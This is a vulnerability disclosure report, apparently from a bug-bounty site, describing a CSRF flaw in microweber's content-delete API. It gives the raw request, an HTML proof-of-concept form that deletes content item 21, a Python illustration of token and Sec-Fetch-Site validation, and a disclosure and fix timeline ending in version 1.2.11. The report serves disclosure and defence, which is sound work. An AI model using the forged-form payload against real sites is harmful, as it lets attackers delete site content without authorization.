Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on Jan 19th 2022


The content-delete endpoint performs no CSRF token validation, so a forged cross-site request can delete the content of the website.


POST /demo/api/content/delete HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


Proof of Concept

  <script>history.pushState('', '', '/')</script>
  <form action="" method="POST">
    <input type="hidden" name="ids&#91;&#93;" value="21" />
    <input type="submit" value="Submit request" />
  </form>


This vulnerability enables an attacker to delete any content without authorization.
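The check the delete endpoint lacks, as an added illustration that is not microweber's own (PHP) code: a server-side validator that requires a session-bound CSRF token and, as a second layer, rejects requests whose browser-set Sec-Fetch-Site header says they came cross-site. The request and session dictionaries and the `_token` / `X-CSRF-Token` names are assumptions for the example.

```python
import hmac
import secrets

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

def issue_csrf_token(session):
    """Create once per session the secret that forms and XHR calls must echo back."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def csrf_check(method, headers, form, session):
    """Return (allowed, reason) for one request to a state-changing endpoint.

    Layer 1: browsers set Sec-Fetch-Site on every request; 'cross-site' means
             another origin initiated it, which is exactly the PoC form above.
    Layer 2: the request must echo the session-bound token, in the '_token'
             form field or the X-CSRF-Token header (the primary check, since
             older clients may send no Sec-Fetch-Site at all).
    """
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    if site is not None and site not in ("same-origin", "none"):
        return False, "rejected: Sec-Fetch-Site=" + site
    expected = session.get("csrf_token")
    supplied = form.get("_token") or h.get("x-csrf-token")
    if not expected or not supplied:
        return False, "rejected: missing CSRF token"
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "rejected: CSRF token mismatch"
    return True, "ok"

# Constructed sample traffic modelled on the report's request (not captured data).
session = {}
token = issue_csrf_token(session)
# The forged request: a form post from another origin carrying only ids[]=21.
FORGED = {"headers": {"Content-Type": "application/x-www-form-urlencoded",
                      "Sec-Fetch-Site": "cross-site"}, "form": {"ids[]": "21"}}
# A legitimate same-origin XHR from the admin UI, token included.
LEGIT = {"headers": {"X-Requested-With": "XMLHttpRequest",
                     "Sec-Fetch-Site": "same-origin", "X-CSRF-Token": token},
         "form": {"ids[]": "21"}}

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, csrf_check("POST", req["headers"], req["form"], session))
```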

We are processing your report and will contact the microweber team within 24 hours. 2 years ago
We have contacted a member of the microweber team and are waiting to hear back 2 years ago
We have sent a follow up to the microweber team. We will try again in 4 days. 2 years ago
We have sent a second follow up to the microweber team. We will try again in 7 days. 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
shubh123-tri has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit 63447b 2 years ago
Peter Ivanov has been awarded the fix bounty